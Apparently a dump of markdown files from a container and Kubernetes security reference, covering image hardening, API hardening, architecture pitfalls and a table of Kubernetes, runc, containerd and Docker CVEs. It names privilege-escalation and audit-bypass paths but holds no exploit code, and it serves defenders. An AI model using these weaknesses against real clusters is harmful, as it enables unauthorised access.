[PKI](https://raesene.github.io/blog/2022/10/29/PCI-Kubernetes-Section5-PKI/) 14 | - [Secrets Management](https://raesene.github.io/blog/2022/11/06/PCI-Kubernetes-Section6-Secrets-Management/) 15 | - [Container Orchestration Tool Auditing](https://raesene.github.io/blog/2022/11/12/PCI-Kubernetes-Section7-Auditing/) 16 | - [Container Monitoring](https://raesene.github.io/blog/2022/11/19/PCI-Kubernetes-Section8-monitoring/) 17 | - [Runtime Security](https://raesene.github.io/blog/2022/11/27/PCI-Kubernetes-Section9-Runtime-Security/) 18 | - [Patching](https://raesene.github.io/blog/2022/12/03/PCI-Kubernetes-Section10-Patching/) 19 | - [Resource Management](https://raesene.github.io/blog/2022/12/10/PCI-Kubernetes-Section11-Resource-Management/) 20 | - [Container Image Building](https://raesene.github.io/blog/2022/12/12/PCI-Kubernetes-Section12-Container-Image-Building/) 21 | - [Registry](https://raesene.github.io/blog/2022/12/14/PCI-Kubernetes-Section13-Registry/) 22 | - [Version Management](https://raesene.github.io/blog/2022/12/16/PCI-Kubernetes-Section14-Version-Management/) 23 | - [Configuration Management](https://raesene.github.io/blog/2022/12/18/PCI-Kubernetes-Section15-Configuration-Management/) 24 | - [Segmentation](https://raesene.github.io/blog/2022/12/20/PCI-Kubernetes-Section16-Segmentation/) -------------------------------------------------------------------------------- /defenders/container_image_hardening.md: -------------------------------------------------------------------------------- 1 | # Defenders - Container Image Hardening 2 | 3 | Improving the security of container images, generally focuses on removing unecessary software to reduce the attack surface. In addition to this, avoiding risky software installation practices is a good idea if you're building production container images and for all images, avoiding using the root user will be important. 4 | 5 | ## Attack surface reduction 6 | 7 | There's a number of options for reducing your container image attack surface. 8 | 9 | ### "Scratch" base image 10 | 11 | This is essentially an almost empty base image with no package management or other operating system libraries. Whether this is a practical option for a given image largely depends on how the application you want to run in the container works. For a scratch image to be usuable, your application needs to be able to run without any supporting operating system libraries. 12 | 13 | Things like statically compiled Golang or ASP.Net Core applications can often work in a scratch containers, where others which use a lot of supporting libraries, are unlikely to have an easy time using this approach. 14 | 15 | ### Google Distroless 16 | 17 | [Google Distroless images](https://github.com/GoogleContainerTools/distroless) provide a very small but more functional image than scratch. They include some important files like timezone files and SSL certificates. These files mean they have a wider/easier compatibility than scratch images, but they are still very small and have a very limited attack surface. 18 | 19 | ### Alpine 20 | 21 | [Alpine Linux](https://www.alpinelinux.org/) is a popular option for smaller Container images. It has the advantage of small base image, but keeps the option of easily adding new operating system packages where needed. There can be some compatibility challenges as they default to using `musl` rather than `gcc` for C libraries, but alpine based images have pretty wide compatibility. 22 | 23 | ### Wolfi 24 | 25 | [Wolfi OS](https://github.com/wolfi-dev) is a project dedicated to producing minimal container images. The package manager is based on Alpine Linux's APK and there's support for `glibc` and `musl`. It's a newer option than the alternatives mentioned here but worth considering to see if it's a good fit for your use case. -------------------------------------------------------------------------------- /defenders/kubernetes_api_security.md: -------------------------------------------------------------------------------- 1 | # API Security 2 | 3 | Kubernetes provides a number of APIs which perform the various functions of a cluster. There are roughly speaking three sets. The control plane APIs (API Server, Controller Manager and Scheduler), the worker node APIs (Kubelet and Kube Proxy) and etcd which may sit with the control plane nodes but can also run on stand alone nodes. 4 | 5 | An important point when reviewing or securing these APIs is that in managed Kubernetes distributions (e.g. EKS, GKE, AKS) it is not possible for cluster operators to directly change the configuration of most of the APIs unless the cloud provider makes that available. The exception is the Kubelet which runs on worker nodes which are available to the cluster operator (unless it uses a "serverless" model like EKS Fargate) 6 | 7 | ## API Visibility 8 | 9 | An initial point when hardening Kubernetes APIs is the decision to restrict access to them at a network level. Whilt it is unwise to rely on IP address filtering as a sole security control, it can help as a layer of defence. For example consider the case where an administrator has lost a set of credentials, or where an attacker has been able to grab a service account token from a cluster. If the API Server is exposed to the Internet, the attacker can then use those stolen credentials easily, whereas restrictions on which IP addresses can connect to the API server buys time for the defenders to notice the attack and rotate the credentials. 10 | 11 | How you restrict access will depend on the type of Kubernetes in use. For cloud managed distributions (Which mostly default to making the API server available over the Internet) a cloud provider setting can be used to restrict access. The cloud provider can often also provide some kind of VPN like access to their services which might be usuable to provide access to the API server. 12 | 13 | For unmanaged distributions, a VPN or bastion host configuration can be used to allow access where needed. 14 | 15 | 16 | ## Kubernetes API Server 17 | 18 | This listens on a variety of ports depending on the distribution in use. Common options are 443/TCP, 6443/TCP and 8443/TCP. In most distributions the `anonymous-auth` flag will be set to `true`. This provides access to unauthenticated users to specific paths specified in the RBAC configuration of the cluster. For example in a Kubeadm cluster the following paths are available without authentication 19 | 20 | ```yaml 21 | rules: 22 | - nonResourceURLs: 23 | - /healthz 24 | - /livez 25 | - /readyz 26 | - /version 27 | - /version/ 28 | verbs: 29 | - get 30 | ``` 31 | 32 | These are generally for liveness checks, but the `/version` endpoint does provide information useful to attackers like precise version information. From a historical perspective, it's worth noting that clusters on 1.14 or earlier will likely provide additional access to unauthenticated users. 33 | 34 | In terms of hardening recommendations for the API server the main one is 35 | 36 | * Disable anonymous authentication where possible, where it is required, ensure that minimal paths are available to unauthenticated users. 37 | 38 | Another area to watch out for is the "insecure API service". This has been [disabled in recent versions](https://github.com/kubernetes/kubernetes/issues/91506) of Kubernetes but may still exist in older clusters. Typically it listened on port 8080/TCP and provided `cluster-admin` access to anyone who could reach it at a network level! 39 | 40 | * Ensure that the `--insecure-port` flag (if available) is set to `0`. 41 | 42 | ## Kubernetes Controller Manager 43 | 44 | Access to the controller manager is generally allowed over port 10257/TCP (can vary with version and distribution). In terms of anonymous access a small number of paths can be specified as a command line flag to allow access, the default settings is as below 45 | 46 | ``` 47 | --authorization-always-allow-paths strings Default: "/healthz,/readyz,/livez" 48 | ``` 49 | 50 | In terms of recommendations :- 51 | 52 | * Review paths which are allowed for anonymous access to ensure that no sensitive data is accessible without authentication. 53 | 54 | ## Kubernetes Scheduler 55 | 56 | Access to the scheduler is generally allowed over port 10259/TCP (can vary with version and distribution). In terms of access this is very similar to the controller manager, the same parameter and default exists, and the recommendation would be the same. In general for both these services there aren't a lot of good reasons for direct access so outside of health checking there shouldn't be much of a requirement for unauthenticated access. 57 | 58 | ## Kubelet 59 | 60 | The Kubelet runs on every worker node (and possibly control plane nodes). Access is via 10250/TCP. The kubelet's configuration with regards to anonymous access is a bit odd and not the same as either the scheduler or controller manager. Anonymous access defaults to being allowed, so it's a requirement of the distribution that they disable it (either on the command line or in the kubelet's configuration file). 61 | 62 | Requests to the root path of the server will return 404, but requests to meaningful paths (like `/pods/`) will return 401 (if anonymous authentication is disabled) or 403 (if anonymous authentication is enabled). 63 | 64 | * Ensure that Kubelet anonymous authentication is disabled unless explicitly required for the operation of the cluster. 65 | 66 | Another legacy option that can still be found in Kubernetes clusters is the use of the "read-only" version of the Kubelet API. This service is not authenticated (and there's no authentication option). It listens on port 10255/TCP by default 67 | 68 | * Ensure that the `--read-only-port` flag on the Kubelet is set to `0`. 69 | 70 | ## Kube Proxy 71 | 72 | TBD 73 | 74 | ## etcd 75 | 76 | Etcd, whilst not specifically part of the Kubernetes project, is a core part of most Kubernetes distributions. Generally it listens on ports 2379/TCP and 2380/TCP. In most Kubernetes distributions there's no anonymous access to it by default, client certificate authentication is used, so the recommendations are quite simple 77 | 78 | * Ensure that etcd is configured to require authentication for all requests. -------------------------------------------------------------------------------- /defenders/kubernetes_security_architecture_considerations.md: -------------------------------------------------------------------------------- 1 | # Kubernetes Security Architecture Considerations 2 | 3 | This is an (at the moment) random list of things to think about when architecting Kubernetes based systems. They may not all still be current and if you know one's not right, PRs always welcome :) 4 | 5 | 6 | ## CVEs 7 | 8 | - There are a number of CVEs in Kubernetes which have no patch and require manual mitigation from cluster operators. 9 | - [CVE-2020-8561](https://groups.google.com/g/kubernetes-security-announce/c/RV2IhwcrQsY) 10 | - [CVE-2021-25740](https://groups.google.com/g/kubernetes-security-announce/c/WYE9ptrhSLE) 11 | - [CVE-2020-8562](https://groups.google.com/g/kubernetes-security-announce/c/-MFX60_wdOY) 12 | - [CVE-2020-8554](https://groups.google.com/g/kubernetes-security-announce/c/iZWsF9nbKE8) 13 | 14 | ## Authentication 15 | 16 | - None of the built-in authentication mechanisms shipped with base k8s are suitable for use by users. 17 | - Token authentication requires clear text tokens on disk and an API server restart to change. 18 | - Client certificate authentication does not support revocation (Github issue [here](https://github.com/kubernetes/kubernetes/issues/18982)) 19 | - Kubernetes does not have a user database, it relies on identity information passed from any approved authentication mechanism. 20 | - This means that if you have multiple valid authentication mechanisms, there is a risk of duplicate user identities. N.B. Kubernetes audit logging does record the identity of the user, but not the authentication source. 21 | 22 | 23 | ## RBAC 24 | 25 | - There are various RBAC rights that can allow for Privilege escalation (there's a Kubernetes Docs page on this with more information [here](https://kubernetes.io/docs/concepts/security/rbac-good-practices/#privilege-escalation-risks)) 26 | - GET or LIST on secrets at a cluster level (or possibly at a namespace level) will allow for privesc via service account secrets. N.B. LIST on its own will do this. 27 | - Access to ESCALATE, IMPERSONATE or BIND as RBAC verbs can allow privilege escalation. 28 | - The `system:masters` group is **hard-coded** into the API server and provides cluster-admin rights to the cluster. 29 | - Access by a user using this group bypasses authorization webhooks (i.e. the request is never sent to the webhook) 30 | - Access to the node/proxy resource allows for privilege escalation via the kubelet API. Users with this right can either go via the Kubernetes API server to access the kubelet API, *or* go directly to the kubelet API. The kubelet API does not have audit logs and its use bypasses admission control. 31 | 32 | ## Networking 33 | 34 | - Pods allowed to use host networking bypass Kubernetes Network Policies. 35 | - Services allows to used nodePorts can't be limited by Kubernetes Network Policies. 36 | - The pod proxy feature can be used to access arbitrary IP addresses **via** the Kubernetes API server (i.e. connections come from the API server address), which may bypass network restrictions (more details [here](https://kinvolk.io/blog/2019/02/abusing-kubernetes-api-server-proxying/)) 37 | 38 | ## Pod Security Standards 39 | 40 | - Without restriction on privileged containers, pods can be used to escalate privileges to node access 41 | - Some capabilities like CAP_SYS_ADMINwill similarly allow for node access 42 | 43 | ## Distributions 44 | 45 | - Many Kubernetes distributions provide a first user which uses a client certificate (so no revocation) bound to the system:masters group, so guaranteed cluster-admin. 46 | - Some distributions place sensitive information such as the API server certificate authority private key in a configmap (e.g. [RKE1](https://github.com/rancher/rke/issues/1024)) 47 | 48 | ## DNS 49 | - At the moment it is possible to use DNS to enumerate all pods and services in a cluster, which can make leak information especially in multi-tenant clusters. (CoreDNS Issue [here](https://github.com/coredns/coredns/issues/4984)) (script to demonstrate [here](https://github.com/raesene/alpine-containertools/blob/master/scripts/k8s-dns-enum.rb)) 50 | 51 | ## Auditing 52 | - Kubernetes auditing is not enabled by default. 53 | - Allowing direct access to the kubelet API effectively bypasses auditing, so care should be taken in allowing this. 54 | - Whilst audit logging provides the user who made the request it doesn't log the authentication mechanism used. As such if there are multiple configured authentication mechanisms (e.g. certificate authentication and OIDC) there is a risk that an attacker can create a user account which would appear to be that of another legitimate user -------------------------------------------------------------------------------- /general_information/container_cve_list.md: -------------------------------------------------------------------------------- 1 | # Container CVE List 2 | 3 | ## Kubernetes 4 | 5 | There is now an officially maintained list for Kubernetes Security vulnerabilities [here](https://kubernetes.io/docs/reference/issues-security/official-cve-feed/), I'll continue to maintain the list below for additional info links, but in general the official list is the best place for the latest vulns. 6 | 7 | |CVE-ID |CVSS Score |Title |Affected Versions | Patched Versions | More info | 8 | |---|---|---|---|---| 9 | | [CVE-2023-5528](https://nvd.nist.gov/vuln/detail/CVE-2023-5528)| 7.2 | Privilege escalation on Windows nodes via in-tree storage plugin | | | | 10 | | [CVE-2023-3955](https://nvd.nist.gov/vuln/detail/CVE-2023-3955) | 8.8 | Privilege escalation on Windows nodes due to insufficient input sanitization | | | | 11 | | [CVE-2023-3893](https://nvd.nist.gov/vuln/detail/CVE-2023-3893) | 8.8 | Privilege escalation via kubernetes-csi-proxy on Windows nodes | | | | 12 | | [CVE-2023-3676](https://nvd.nist.gov/vuln/detail/CVE-2023-3676) | 8.8 | Privilege escalation on Windows nodes due to insufficient input sanitization | | | | 13 | | [CVE-2023-2431](https://nvd.nist.gov/vuln/detail/CVE-2023-2431) | 3.4 | Bypass of seccomp profile enforcement| | | | 14 | | [CVE-2023-2727](https://nvd.nist.gov/vuln/detail/CVE-2023-2727), [CVE-2023-2728](https://nvd.nist.gov/vuln/detail/CVE-2023-2728) | N/A | Bypassing policies imposed by the ImagePolicyWebhook and ServiceAccount admission plugin | | | | 15 | | [CVE-2023-2878](https://nvd.nist.gov/vuln/detail/CVE-2023-2878) | 6.5 | Service account tokens disclosed in logs by secrets-store-csi-driver | | | | 16 | |[CVE-2022-3294](https://github.com/kubernetes/kubernetes/issues/113757) | 6.6 | Node address isn't always verified when proxying | Earlier than v1.21.14, v1.22.0 - v1.22.15, v1.23.0 - v1.23.13, v1.24.0 - v1.24.7, v1.25.0 - v1.25.3 | v1.22.16, v1.23.14, v1.24.8, v1.25.4 | | 17 | |[CVE-2022-3162](https://github.com/kubernetes/kubernetes/issues/113756) | 6.5 | Unauthorized read of Custom Resources | Earlier than v1.21.14, v1.22.0 - v1.22.15, v1.23.0 - v1.23.13, v1.24.0 - v1.24.7, v1.25.0 - v1.25.3 | v1.22.16, v1.23.14, v1.24.8, v1.25.4 | | 18 | |[CVE-2022-3172](https://github.com/kubernetes/kubernetes/issues/112513) | 5.1 | Aggregated API server can cause clients to be redirected (SSRF) | Earlier than v1.21.14, v1.22.0 - v1.22.13, v1.23.0 - v1.23.10, v1.24.0 - v1.24.4, v1.25.0 | v1.22.14, v1.23.11, v1.24.5, v1.25.1 | | 19 | |[CVE-2021-25749](https://github.com/kubernetes/kubernetes/issues/112192) | 3.4 | `runAsNonRoot` logic bypass for Windows containers | v1.20 - v1.21, v1.22.0 - v1.22.13, v1.23.0 - v1.23.10, v1.24.0 - v1.24.4 | v1.22.14, v1.23.11, v1.24.5, v1.25.0 | | 20 | |[CVE-2020-8561](https://groups.google.com/g/kubernetes-security-announce/c/RV2IhwcrQsY) | 4.1 | Webhook redirect in kube-apiserver | All | No Patch Available | | 21 | |[CVE-2021-25741](https://groups.google.com/g/kubernetes-security-announce/c/nyfdhK24H7s)| 8.8 | Symlink Exchange Can Allow Host Filesystem Access | v1.22.0 - v1.22.1, v1.21.0 - v1.21.4, v1.20.0 - v1.20.10, Earlier than v1.19.15 | v1.22.2, v1.21.5, v1.20.11, v1.19.15 | | 22 | |[CVE-2021-25740](https://groups.google.com/g/kubernetes-security-announce/c/WYE9ptrhSLE)| 3.1 | Endpoint & EndpointSlice permissions allow cross-Namespace forwarding | All | No Patch Available (mitigations in advisory) | | 23 | |[CVE-2021-25737](https://groups.google.com/g/kubernetes-security-announce/c/xAiN3924thY)| 2.7 | Holes in EndpointSlice Validation Enable Host Network Hijack |v1.21.0, v1.20.0 - v1.20.6, v1.19.0 - v1.19.10, v1.16.0 - v1.18.18 | v1.21.1, v1.20.7, v1.19.11, v1.18.19 | | 24 | |[CVE-2021-25736](https://groups.google.com/g/kubernetes-security-announce/c/lIoOPObO51Q)| 5.8 | Windows kube-proxy LoadBalancer contention | v1.20.0 - v1.20.5, v1.19.0 - v1.19.9, v1.18.0 - v1.18.17 | v1.21.0, v1.20.6, v1.19.10, v1.18.18 | | 25 | |[CVE-2020-8562](https://groups.google.com/g/kubernetes-security-announce/c/-MFX60_wdOY)| 2.2 | Bypass of Kubernetes API Server proxy TOCTOU | v1.21.0, v1.20.0 - v1.20.6, v1.19.0 - v1.19.10, v1.18.0 - v1.18.18 | No Patch Available (mitigations in advisory) | | 26 | |[CVE-2021-25735](https://groups.google.com/g/kubernetes-security-announce/c/FKAGqT4jx9Y)| 6.5 | Validating Admission Webhook does not observe some previous fields | v1.20.0 - v1.20.5, v1.19.0 - v1.19.9, Earlier than v1.18.17 | v1.21.0, v1.20.6, v1.19.10, v1.18.18 | | 27 | |[CVE-2020-8554](https://groups.google.com/g/kubernetes-security-announce/c/iZWsF9nbKE8)| 6.3 | Man in the middle using LoadBalancer or ExternalIPs | All | No Patch Available (mitigations in advisory) | | 28 | |[CVE-2020-8565](https://groups.google.com/g/kubernetes-security-announce/c/9d0gPe7SCM8)| 4.7 | Token Leaks in verbose logs | all v1.19 and earlier | v1.20.0 | | 29 | |[CVE-2020-8559](https://groups.google.com/g/kubernetes-security-announce/c/JAIGG5yNROs)| 6.4 | Privilege escalation from compromised node to cluster | v1.18.0-1.18.5, v1.17.0-1.17.8, v1.16.0-1.16.12, all v1.15 and earlier | v1.18.6, v1.17.9, v1.16.13 | | 30 | |[CVE-2020-8558](https://groups.google.com/g/kubernetes-security-announce/c/B1VegbBDMTE)| 5.4 | Kubernetes: Node setting allows for neighboring hosts to bypass localhost boundary | v1.18.0-1.18.3, v1.17.0-1.17.6, earlier than <1.16.10 | v1.18.4,v1.17.7, v1.16.11 | | 31 | |[CVE-2020-8557](https://groups.google.com/g/kubernetes-security-announce/c/cB_JUsYEKyY)| 5.5 | Node disk DOS by writing to container /etc/hosts | v1.18.0-1.18.5, v1.17.0-1.17.8, earlier than v1.16.13 | v1.18.6, v1.17.9, v1.16.13 | | 32 | |[CVE-2020-8555](https://groups.google.com/g/kubernetes-security-announce/c/kEK27tqqs30)| 6.3 | Half-Blind SSRF in kube-controller-manager | v1.18.0, v1.17.0 - v1.17.4, v1.16.0 - v1.16.8, earlier than < v1.15.11 | v1.18.1, v1.17.5, v1.16.9, v1.15.12 | [finders blog](https://medium.com/@BreizhZeroDayHunters/when-its-not-only-about-a-kubernetes-cve-8f6b448eafa8) | 33 | |[CVE-2019-11254](https://groups.google.com/g/kubernetes-security-announce/c/wuwEwZigXBc)| 6.5 | denial of service vulnerability from malicious YAML payloads |v1.17.0-v1.17.2, v1.16.0-v1.16.6, earlier than v1.15.10 | v1.17.3, v1.16.7, v1.15.10 | | 34 | |[CVE-2020-8552](https://groups.google.com/g/kubernetes-security-announce/c/2UOlsba2g0s)| 5.3 | Denial of service from authenticated requests to the Kube API server| v1.17.0-v1.17.2, v1.16.0-v1.16.6, earlier than v1.15.10 | v1.17.3, v1.16.7, v1.15.10 | | 35 | |[CVE-2020-8551](https://groups.google.com/g/kubernetes-security-announce/c/2UOlsba2g0s)| 4.3 | Denial of service from authenticated requests to the Kubelet |v1.17.0-v1.17.2, v1.16.0-v1.16.6, v1.15.0-v1.15.10 | v1.17.3, v1.16.7, v1.15.10| | 36 | |[CVE-2019-11253](https://groups.google.com/g/kubernetes-security-announce/c/jk8polzSUxs)| 7.5 | Denial of Service from malicious YAML or JSON payloads | v1.16.0-v1.16.1, v1.15.0-v1.15-4, v1.14.0-v1.14.7, earlier than v1.13.11 | v1.16.2,v1.15.5,v1.14.8,v1.13.12 | | 37 | |[CVE-2019-11251](https://groups.google.com/g/kubernetes-security-announce/c/6vTrp6tVpHo)| 5.7 | kubectl cp could lead to files being create outside its destination directory | v1.15.0-v1.15.3, v1.14.0-v1.14.6, earlier than v1.13.10 | v1.16.0, v1.15.4, v1.14.7, v1.13.11 | | 38 | |[CVE-2019-11248](https://groups.google.com/g/kubernetes-security-announce/c/pKELclHIov8)| 8.2 | The debugging endpoint /debug/pprof is exposed over the unauthenticated Kubelet healthz port | v1.14.0 - v1.14.4, v1.13.0 - v1.13.8, earlier than v1.12.10 | v1.15.0, v1.14.4, v1.13.8, and v1.12.10 | | 39 | |[CVE-2019-11247](https://groups.google.com/g/kubernetes-security-announce/c/vUtEcSEY6SM)| 8.1 | API server allows access to custom resources via wrong scope | v1.15.0 - v1.15.1, v1.14.0 - v1.14.5, earlier than v1.13.9 | v1.15.2, v1.14.5, v1.13.9 | | 40 | |[CVE-2019-11249](https://groups.google.com/g/kubernetes-security-announce/c/vUtEcSEY6SM)| 6.5 | kubectl cp potential directory traversal | v1.15.0 - v1.15.1, v1.14.0 - v1.14.5, earlier than v1.13.9 | v1.15.2, v1.14.5, v1.13.9 | | 41 | |[CVE-2019-11246](https://groups.google.com/g/kubernetes-security-announce/c/NLs2TGbfPdo)| 6.5 | kubectl cp could lead to files being create outside its destination directory | v1.14.0-v1.14.1, v1.13.0-v1.13.5, earlier than v1.12.9 | v1.12.9, v1.13.6, v1.14.2 | | 42 | |[CVE-2019-11245](https://groups.google.com/g/kubernetes-security-announce/c/lAs07uKLq2k)| 7.8 | Security regression in Kubernetes kubelet | v1.13.6, v1.14.2 | v1.13.7, v1.14.3 | | 43 | |[CVE-2019-1002101](https://groups.google.com/g/kubernetes-security-announce/c/OYFV1hiDE2w)| 5.5 | kubectl - potential directory traversal in kubectl cp | v1.13.0-v1.13.4, v1.12.0-v1.12.6, earlier than v1.11.9 | v1.11.9, v1.12.7, v1.13.5, v1.14.0 | | 44 | |[CVE-2019-1002100](https://groups.google.com/g/kubernetes-security-announce/c/i-HEIs8WC5w)|6.5 | kube-apiserver authenticated DoS risk | v1.13.0 - v1.13.3, v1.12.0 - v1.12.5, earlier than v1.11.8 | v1.11.8, v1.12.6, v1.13.4 | | 45 | |[CVE-2018-1002105](https://groups.google.com/g/kubernetes-security-announce/c/fm1MkmubMoI)|9.8 | kuberneretes Aggregated API credential re-use | v1.12.0-v1.12.2, v1.11.0-v1.11.4, earlier than v1.10.11 | v1.10.11, v1.11.5, v1.12.3 | | 46 | 47 | - Information from [kubernetes-security-announce](https://groups.google.com/g/kubernetes-security-announce) 48 | 49 | ## runc 50 | 51 | |CVE-ID |CVSS Score |Title |Affected Versions | Patched Versions | More Info | 52 | |[CVE-2024-21626](https://github.com/opencontainers/runc/security/advisories/GHSA-xr7r-f8xq-vfvv)|8.6| several container breakouts due to internally leaked fds|>=v1.0.0-rc93,<=1.1.11|1.1.12|[Withsecure Write-up](https://labs.withsecure.com/publications/runc-working-directory-breakout--cve-2024-21626) | 53 | |[CVE-2022-29162](https://github.com/opencontainers/runc/security/advisories/GHSA-f3fp-gc8g-vw66) | 7.8 | Default inheritable capabilities for linux container should be empty | < 1.1.2 | 1.1.2 | | 54 | |[CVE-2021-43784](https://github.com/opencontainers/runc/security/advisories/GHSA-v95c-p5hm-xq8f) | 5.0 |Overflow in netlink bytemsg length field allows attacker to override netlink-based container configuration | <1.0.3 | 1.0.3 | | 55 | |[CVE-2021-30465](https://github.com/advisories/GHSA-c3xm-pvg7-gh7r) | 7.6 |Container Filesystem Breakout via Directory Traversal | <= 1.0.0-rc94 |1.0.0-rc95 |[Etienne Champtar's Blog](http://blog.champtar.fr/runc-symlink-CVE-2021-30465/) | 56 | |[CVE-2019-16884](https://nvd.nist.gov/vuln/detail/CVE-2019-16884) | 7.5 |Apparmor restriction bypass | <= 1.0-rc8 | 1.0-rc9 | | 57 | |[CVE-CVE-2019-5736](https://nvd.nist.gov/vuln/detail/CVE-2019-5736) | 8.6 |Runc Privileged Escalation | <= 1.0-rc6 | 1.0-rc7 | [Dragon Sector Blog](https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html) | 58 | |[CVE-2016-9962](https://nvd.nist.gov/vuln/detail/CVE-2016-9962) | 6.4 |container escape via ptrace | Docker < 1.12.6 | Docker => 1.12.6 | | 59 | 60 | 61 | ## ContainerD 62 | 63 | |CVE-ID |CVSS Score |Title |Affected Versions | Patched Versions | More Info | 64 | | [CVE-2023-25153](https://github.com/containerd/containerd/security/advisories/GHSA-259w-8hf6-59c2) | 5.5 | OCI image importer memory exhaustion | <= 1.5.17, 1.6.0-1.6.17 | 1.5.18, 1.6.18 | | 65 | | [CVE-2023-25173](https://github.com/containerd/containerd/security/advisories/GHSA-hmfx-3pcx-653p) | 5.5 | Supplementary groups are not set up properly | <= 1.5.17, 1.6.0-1.6.17 | 1.5.18, 1.6.18 | | 66 | | [CVE-2022-23471](https://github.com/containerd/containerd/security/advisories/GHSA-2qjp-425j-52j9) | 5.7 | containerd CRI stream server: Host memory exhaustion through Terminal resize goroutine leak | < 1.5.16, 1.6.0-1.6.11 | 1.5.16, 1.6.12 | | 67 | | [CVE-2022-31030](https://github.com/containerd/containerd/security/advisories/GHSA-5ffw-gxpp-mxpf) | 5.5 | containerd CRI plugin: Host memory exhaustion through ExecSync | <= 1.5.12, 1.6.0, 1.6.1, 1.6.2, 1.6.3, 1.6.4, 1.6.5 | 1.5.13, 1.6.6 | | 68 | | [CVE-2022-24769](https://github.com/containerd/containerd/security/advisories/GHSA-c9cp-9c75-9v8c) | 5.9 | Default inheritable capabilities for linux container should be empty | <= 1.5.10, 1.6.0, 1.6.1 | 1.5.11, 1.6.2 | | 69 | | [CVE-2022-23648](https://github.com/containerd/containerd/security/advisories/GHSA-crp2-qrr5-8pq7) | 7.5 | containerd CRI plugin: Insecure handling of image volumes | <= 1.4.12, 1.5.0 - 1.5.9, 1.6.0 | 1.4.13, 1.5.10, 1.6.1 | [PoC repo](https://github.com/raesene/CVE-2022-23648-POC) | 70 | | [CVE-2021-43816](https://github.com/containerd/containerd/security/advisories/GHSA-mvff-h3cj-wj9c) | 9.1 | containerd CRI plugin: Unprivileged pod using `hostPath` can side-step SELinux | >= 1.5.0, < 1.5.9 | 1.5.9 | | 71 | | [CVE-2021-41103](https://github.com/containerd/containerd/security/advisories/GHSA-c2h3-6mxw-7mvq) | 5.9 | nsufficiently restricted permissions on container root and plugin directories | <1.4.11,<1.5.7 | 1.4.11,1.5.7 | | 72 | | [CVE-2021-32760](https://github.com/containerd/containerd/security/advisories/GHSA-c72p-9xmj-rx3w) | 6.3 | Archive package allows chmod of file outside of unpack target directory | <=1.4.7, <=1.5.3 | 1.5.4, 1.4.8 | | 73 | | [CVE-2021-21334](https://github.com/containerd/containerd/security/advisories/GHSA-6g2q-w5j3-fwh4) | 6.3 | containerd CRI plugin: environment variables can leak between containers | <=1.3.9, <= 1.4.3 | 1.3.10, 1.4.4 | | 74 | | [CVE-2020-15157](https://github.com/containerd/containerd/security/advisories/GHSA-742w-89gc-8m9c) | 6.1 | containerd v1.2.x can be coerced into leaking credentials during image pull | < 1.3.0 | 1.2.14, 1.3.0 | [Darkbit Blog Post](https://darkbit.io/blog/cve-2020-15157-containerdrip) | 75 | | [CVE-2020-15257](https://github.com/containerd/containerd/security/advisories/GHSA-36xw-fx78-c5r4) | 5.2 | containerd-shim API exposed to host network containers | <=1.3.7, 1.4.0, 1.4.1 | 1.3.9, 1.4.3 | [NCC Group Technical Vulnerability Discussion](https://research.nccgroup.com/2020/12/10/abstract-shimmer-cve-2020-15257-host-networking-is-root-equivalent-again/) | 76 | 77 | 78 | ## Docker 79 | 80 | |CVE-ID |CVSS Score |Title |Affected Versions | Patched Versions | More Info | 81 | | [CVE-2022-36109](https://github.com/moby/moby/security/advisories/GHSA-rc4r-wh2q-q6c4) | 6.3 | Security vulnerability relating to supplementary group permissions | < 20.10.18 | 20.10.18 | | 82 | | [CVE-2021-41190](https://github.com/moby/moby/security/advisories/GHSA-xmmx-7jpf-fx42) | 5.0 | Ambiguous OCI manifest parsing | < 20.10.11 | 20.10.11 | | 83 | | [CVE-2021-41091](https://github.com/moby/moby/security/advisories/GHSA-3fwx-pjgw-3558) | 6.3 | Insufficiently restricted permissions on data directory | < 20.10.9 | 20.10.9 | [Cyberark blog post](https://www.cyberark.com/resources/threat-research-blog/how-docker-made-me-more-capable-and-the-host-less-secure) | 84 | | [CVE-2021-41089](https://github.com/moby/moby/security/advisories/GHSA-v994-f8vw-g7j4) | 6.3 | `docker cp` allows unexpected chmod of host files | < 20.10.9 | 20.10.9 | | 85 | | [CVE-2021-21285](https://github.com/moby/moby/security/advisories/GHSA-6fj5-m822-rqx8) | 6.5 | Docker daemon crash during image pull of malicious image | < 19.03.15, < 20.10.3 | 19.03.15, 20.10.3 | | 86 | | [CVE-2021-21284](https://github.com/moby/moby/security/advisories/GHSA-7452-xqpj-6rpc) | 6.8 | Access to remapped root allows privilege escalation to real root | < 19.03.15, < 20.10.3 | 19.03.15, 20.10.3 | | 87 | | [CVE-2020-27534](https://nvd.nist.gov/vuln/detail/CVE-2020-27534) | 5.3 | Docker calls os.OpenFile with a potentially unsafe qemu-check temporary pathname | < 19.03.9 | 19.03.9 | | 88 | | [CVE-2019-14271](https://nvd.nist.gov/vuln/detail/CVE-2019-14271) | 9.8 | docker cp vulnerability | 19.03 | 19.03.1 | [Tenable Blog Post](https://www.tenable.com/blog/cve-2019-14271-proof-of-concept-for-docker-copy-docker-cp-vulnerability-released) | 89 | | [CVE-2019-13509](https://nvd.nist.gov/vuln/detail/CVE-2019-13509) | 7.5 | Docker Engine in debug mode may sometimes add secrets to the debug log | < 18.09.8 | 18.09.8 | | 90 | | [CVE-2019-13139](https://nvd.nist.gov/vuln/detail/CVE-2019-13139) | 8.4 | Manipulation of the build path for the "docker build" command could allow for command execution | < 18.09.4 | 18.09.4 | | 91 | | [CVE-2018-15664](https://nvd.nist.gov/vuln/detail/CVE-2018-15664) | 7.5 | docker cp race condition | < 18.06.1-ce-rc2 | 18.06.1-ce-rc2 | [Capsule8 blog post](https://capsule8.com/blog/race-conditions-cloudy-with-a-chance-of-r-w-access/) | 92 | | [CVE-2017-14992](https://nvd.nist.gov/vuln/detail/CVE-2017-14992) | 6.5 | Dos via gzip bomb | < 17.09.1 | 17.09.1 | | 93 | 94 | 95 | | | | | | | | -------------------------------------------------------------------------------- /general_information/container_security_standards.md: -------------------------------------------------------------------------------- 1 | # Container Security Standards 2 | 3 | There are a number of sets of guidance which are provided by various bodies and can be useful in understanding how to secure container environments. Generally speaking, they fall into two categories, Compliance standards and hardening guides. The difference is that compliance standards generally seek to give precise recommendations at the level of setting specific parameters and file permissions for a specific product, where hardening guides tend to cover more ground at a higher level Whilst hardening guides may have some specific details, they don't try to comprehensively cover all settings related to security in one product. 4 | 5 | ## Complaince standards 6 | 7 | - [CIS Benchmark for Kubernetes](https://www.cisecurity.org/benchmark/kubernetes) - There are benchmarks for a number of distributions. The main one covers Kubeadm and there are also benchmarks for EKS, AKS, GKE, OpenShift, ACK and OKE. 8 